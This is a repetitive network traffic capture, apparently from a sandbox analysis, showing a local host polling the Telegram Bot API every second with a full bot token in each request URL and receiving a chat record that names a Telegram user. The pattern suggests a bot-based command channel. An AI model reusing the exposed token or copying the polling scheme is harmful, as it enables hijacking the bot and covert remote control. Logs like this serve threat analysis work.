2024-06-05 01:58:08 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49837	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:09 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:09 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:09 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:09 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49838	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:09 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:10 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:10 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49839	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:11 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:11 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:11 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:11 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49840	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:12 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:12 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:12 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:12 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49841	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:13 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:13 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:13 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49842	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:14 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:14 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:14 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:14 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49843	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:15 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:15 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:15 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49844	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:16 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:16 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:16 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:16 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49845	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:17 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:17 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:18 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49846	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:18 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:18 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:18 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49847	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:19 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:20 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:20 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49848	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:20 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:20 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:20 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49849	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:22 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:22 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:22 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: 